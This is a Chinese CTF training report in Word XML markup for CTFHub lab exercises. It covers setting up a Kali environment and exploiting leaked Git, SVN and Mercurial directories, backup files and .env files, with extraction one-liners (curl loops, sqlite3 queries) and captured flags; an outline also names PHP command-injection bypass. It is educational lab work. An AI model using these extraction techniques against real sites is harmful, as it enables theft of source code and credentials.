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微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="1F3B63"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>CTF 实战训练报告 · task9</w:t>
      </w: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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>训练内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：环境安装 → 信息泄露漏洞 → PHP 命令执行与绕过</w:t>
      </w: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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>训练周期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：3 天（0.5 + 1 + 1）</w:t>
      </w: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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：WSL2 + Kali Linux Rolling + Windows Terminal</w:t>
      </w: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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>训练方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：CTFHub 靶场通关 + 本地复刻（每个漏洞都在自己的虚拟机上复现）</w:t>
      </w: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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>成果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CTFHub 通关 17 题，取得 17 个 flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:color="BFBFBF"/>
        </w:pBdr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时长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产出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第一章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环境安装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0.5 day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WSL2 + Kali + 基础 Linux 命令表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第二章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信息泄露漏洞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 day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9 个子题通关 + 五问解答 + 三类版本库统一框架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第三章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PHP 命令执行与绕过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 day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8 个子题通关 + 8 个函数实测对比 + 6 类绕过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核心结论（一句话）</w:t>
      </w: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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>信息泄露是"该藏的东西被当成了公开的东西"；命令执行是"用户输入被拼进了要执行的字符串"。</w:t>
      </w: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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>两者的共同点：漏洞不在代码逻辑里，而在"信任边界"上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:color="BFBFBF"/>
        </w:pBdr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B63"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>第一章 环境安装（0.5 day）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1.1 为什么用虚拟机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三个理由：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目标通常是 Linux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多数靶场、Web 中间件、工具链都在 Linux 上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工具需要 Linux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sqlite3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hg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svn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rip-*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php_filter_chain_generator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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隔离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打靶过程可能触发反弹 shell、下载未知文件，不能污染宿主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不推荐用云服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：反弹 shell、内网横向、扫描类操作容易被云厂商封禁或告警。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1.2 WSL2 + Kali Linux 安装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① 启用 WSL2（管理员 PowerShell）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wsl --install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② 安装 Kali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wsl --install -d kali-linux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③ 验证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wsl -d kali-linux -- cat /etc/os-release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本次实际环境：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Kali GNU/Linux Rolling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PHP 8.4.24 (cli)          ← 本地实测用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Mercurial 7.2.3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Subversion 1.14.5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sqlite3 / python3 / curl / git 均自带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网络说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">：Windows 侧 git 需要配置代理才能连 GitHub（本项目用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>http.proxy=http://127.0.0.1:7890</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">）；Kali 内访问 GitHub 偶尔受限，改用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>gh-proxy.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 镜像下载工具。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1.3 基础 Linux 命令（本次实战高频用到）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1.3.1 目录与文件列举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命令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本次使用场景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ls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列当前目录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命令注入后第一句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ls -la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列出含隐藏文件、权限、大小、时间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判断 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>flag_xxx.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 是不是目录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pwd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当前工作目录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一步定位 web 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find / -name "*flag*"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按名字全盘找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找 flag 文件（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>别加 `-maxdepth`，会漏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find / -name index.php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按已知文件名反推目录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找 web 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file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stat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判断文件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/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1.3.2 文件读取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命令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特点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最常用，但</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>常被过滤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tac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cat 反过来</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">，按行逆序输出 —— 绕过 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 过滤的首选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head -1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tail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取前/后 N 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sort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nl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rev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排序 / 加行号 / 反转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base64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编码输出 —— </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>避开 HTML 特殊字符的神器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grep -r "ctfhub" /var/www/html/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按内容找文件（最准）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xxd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od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十六进制查看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strings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从二进制里捞可打印字符串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1.3.3 内容特征查找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命令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grep -r ctfhub /var/www/html/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一步出"路径 + 文件名 + 内容"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grep -ro "ctfhub{[^}]*}" /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只输出匹配部分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strings .hg/store/00changelog.i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从二进制元数据里找明文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od -A d -t x1z file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十六进制 + ASCII 双栏，看文件头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1.3.4 数据处理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命令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base64 -d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解码（GNU 版宽容，会自动跳过非 base64 字符）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openssl base64 -d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严格版，遇到垃圾字符直接失败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grep -oE '^[A-Za-z0-9+/=]+'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从混有 HTML 的响应里抠出 base64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sed 's/&lt;.*//'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cut -d'&lt;' -f1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砍掉 HTML 尾巴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awk '{print $4"\t"$2}'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取指定列（Git index 差集用）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comm -23 &lt;(...) &lt;(...)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求差集（Git Index 题核心）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tr -d '\000'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去掉 NUL 字节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1.3.5 版本库工具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工具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git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Git 泄露题的全部操作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sqlite3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读 SVN 的 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>wc.db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hg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（mercurial）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读 HG 的 revlog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svn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复刻 SVN 仓库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rip-svn.pl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rip-hg.pl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dvcs-ripper 的自动化脚本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php_filter_chain_generator.py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生成 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>php://filter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 过滤器链 RCE payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:color="BFBFBF"/>
        </w:pBdr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B63"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>第二章 信息泄露漏洞（1 day）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2.1 模块总览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CTFHub「信息泄露」模块 9 题全部通关：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题型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flag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关键技术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网站源码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ctfhub{95c6f03d7cda19058d88ec1f}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备份包字典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bak 文件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ctfhub{ff20cd30144373eedaa01abc}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后缀爆破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vim 缓存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ctfhub{1bbffdd2cca2f93ddc0ca8d8}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.swp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 结构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.DS_Store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ctfhub{2e801a81a591f99ffca80e07}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macOS 元数据解析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Git Log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ctfhub{dc8b0894d5a5689a22a35ffe}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reflog + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>git show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Git Stash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ctfhub{03f0f3f844084d7134cedad3}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refs/stash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Git 未删变体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ctfhub{b0571eeb61f6343ced553555}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reflog 只有 2 行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SVN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ctfhub{6fd7676ba56da2a90a11af9a}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wc.db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PRISTINE.refcount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HG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ctfhub{9260b70ead69a60fb2e0d968}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revlog + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>__</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 编码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另有两道独立复现（非模块题，用于验证"不是抄 WP"）：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复现对象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flag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Git Log 独立复现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ctfhub{009ee4ed36138139d7349d59}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换实例重新走一遍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Git Stash 独立复现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ctfhub{053da77b26b117ed9a380b03}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HG 第二实例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ctfhub{52dd316df7c89131d95b8161}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验证文件名随机化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第一轮（更早的记录，同模块）：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ctfhub{1e5a12263055250cb6c8f170}   302 跳转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ctfhub{cf2690f992c9ebe484432aee}   Cookie 伪造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ctfhub{db7ba83bb0e787993a2fa43f}   基础认证 1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ctfhub{b227a7576366a4be3848faa5}   基础认证 2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ctfhub{d5b85603ca77329a3ae5a18}   Git 历史</w:t>
      </w:r>
    </w:p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2.2 五类信息泄露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2.2.1 Git 泄露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成因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">：在 web 目录执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>git clone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git pull</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 部署，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 留在 web 根。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`.git` 里有什么：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危害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全部源码（每个版本）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objects/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完整源码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全部提交历史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objects/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refs/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开发过程、注释里的密码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未提交改动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index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暂存区敏感文件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被"藏起来"的改动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refs/stash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连 commit 都没进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被"删掉"的东西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objects/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logs/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git rm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 删不掉对象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四种变体与判据：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变体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判据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提取命令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Log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reflog 有 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>remove flag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git show &lt;add flag 的哈希&gt;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Stash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refs/stash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 200 / reflog 有 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>reset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git stash show -p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Index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index 与 HEAD 的 blob 差集非空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git diff --cached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未删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reflog 只有 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>init → add flag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ls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cat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四条命令兜底（下载后各打一遍）：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ls &amp;&amp; cat *.txt                       # 未删变体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log --all -p | grep -i ctfhub     # Log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stash show -p                     # Stash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diff --cached                     # Index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万能兜底（不判断题型，扫全部对象）：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cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' \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| awk '$1=="blob"{print $2}' \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| while read -r h; do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c=$(git cat-file -p "$h" 2&gt;/dev/null | grep -oE '(ctfhub|flag)\{[^}]*\}' | head -1)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[ -n "$c" ] &amp;&amp; echo "★ $h → $c"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done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2.2.2 备份文件下载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六个载体：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网站源码包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www.zip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web.tar.gz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backup.zip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site.rar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后缀变体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.bak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.old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.orig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.save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.swp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.copy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.tmp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.txt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.1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~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编辑器缓存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>（vim 系列，见 2.3）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系统元数据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.DS_Store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Thumbs.db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desktop.ini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配置密钥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.env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Dockerfile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docker-compose.yml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.gitlab-ci.yml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IDE 工程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.idea/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.vscode/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.settings/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*.iml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 `.bak` 能读源码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：服务器按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>最后扩展名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>决定解析。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index.php.bak  →  .bak  →  静态文件  →  原样输出 ✅ 泄露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index.bak.php  →  .php  →  交给 PHP  →  不泄露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2.2.3 SVN 泄露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成因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">：在 web 目录 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>svn checkout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.svn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 留在 web 根。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正确做法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svn export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">（不带 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.svn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>）。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两代结构：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`.svn` 位置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元数据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≤ 1.6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每个子目录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entries</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（纯文本，有文件列表）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text-base/&lt;名&gt;.svn-base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1.7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只有根目录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wc.db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（SQLite）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pristine/&lt;sha1前2位&gt;/&lt;sha1&gt;.svn-base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1.7+ 打法（实测）：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-o wc.db "$T/.svn/wc.db"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sqlite3 wc.db "SELECT checksum, size, refcount FROM PRISTINE;"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  $sha1$bf45c36a... | 221 | 1     ← 还在用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  $sha1$0b4474e3... |  33 | 0     ← ★ 被删掉的旧版本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`refcount = 0` = 没有任何工作副本文件引用它 = 被删掉的旧版本残留。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⚠️ 只看 `NODES` 会漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">：被删的文件 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>presence='not-present'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checksum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为空。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四行版：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T="http://challenge-xxx:10800"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-o wc.db "$T/.svn/wc.db"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for h in $(sqlite3 wc.db "SELECT checksum FROM PRISTINE;" | sed 's/\$sha1\$//'); do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curl -s "$T/.svn/pristine/${h:0:2}/${h}.svn-base"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done | grep -a ctfhub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2.2.4 HG（Mercurial）泄露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成因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">：在 web 目录 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>hg clone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hg pull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三个关键文件：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.hg/last-message.txt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最后一次 commit message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add flag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.hg/store/fncache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文件清单缓存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每行一个 store 路径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.hg/dirstate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当前文件列表（二进制）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strings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 出 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>flag_xxx.txt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⚠️ 两个致命细节：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① 文件名要编码：`_` → `__`（下划线是转义符）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fncache 里：data/flag_807728508.txt.i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实际路径：  data/flag__807728508.txt.i     ← 双下划线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直接按 fncache 取 → 404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改成双下划线     → 200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② revlog 里的数据带标记字节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75 63 74 66 68 75 62 7b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└┬┘ 'u' = 后面是原文（不是 zlib）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首字节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'u'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> (0x75)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原文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'x'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> (0x78)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zlib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0x00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原文（无标记）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最简打法：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① 拿文件名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"$T/.hg/dirstate" | strings | grep -E '\.txt$'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② 名字里 _ 换成 __，取内容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curl -s "$T/.hg/store/data/flag__807728508.txt.i" | grep -ao 'ctfhub{[^}]*}'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2.2.5 `.env` 直接暴露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成因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.env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 放在 web 根，被 HTTP 直接读取。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内容常含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：数据库密码、API Key、JWT Secret、Redis 密码。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注意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">：有些值是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>base64 编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">的，要 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>base64 -d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2.3 作业五问（详见 `notes/20-信息泄露作业答案.md`）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问 1：Git 泄露是什么，为什么会有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是什么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.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 目录被部署到 web 根，HTTP 能直接读。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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">：用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>clone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pull</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 部署、在 web 目录直接开发、打包没加 </w:t>
